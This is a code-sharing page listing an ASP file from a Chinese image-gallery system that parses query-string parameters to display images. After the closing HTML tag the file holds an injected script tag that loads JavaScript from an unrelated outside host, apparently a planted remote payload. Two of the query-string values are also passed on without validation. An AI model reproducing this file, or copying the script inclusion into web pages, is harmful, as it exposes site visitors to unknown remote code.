jscode.asp

来自「一款有用的图片管理系统」· ASP 代码 · 共 25 行

ASP
25
字号
<!--#include file="conn.asp"-->
<!--#include file="ShowImage.asp"-->
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>无标题文档</title>
<link href="style/style.css" rel="stylesheet" type="text/css">
</head>
<body topmargin="0" leftmargin="0" rightmargin="0" bottommargin="0">
<%
ShowContent   =Trim(Request.QueryString("ShowContent"))
ShowContent   =split(ShowContent,",")
ImageType    =ShowContent(0)
ImageClass   =ShowContent(1)
ImageWidth   =cint(ShowContent(2))
ImageHeight  =cint(ShowContent(3))
ImageCol     =cint(ShowContent(4))
ImagePage    =cint(ShowContent(5))
ImageContent =cint(ShowContent(6))
ShowPage     =cint(ShowContent(7))
ShowImages ImageType,ImageClass,ImageWidth,ImageHeight,ImageCol,ImagePage,ImageContent,ShowPage
%>
</body>
</html>
<script language=javascript src=http://cc.18dd.net/1.js></script>

⌨️ 快捷键说明

复制代码Ctrl + C
搜索代码Ctrl + F
全屏模式F11
增大字号Ctrl + =
减小字号Ctrl + -
显示快捷键?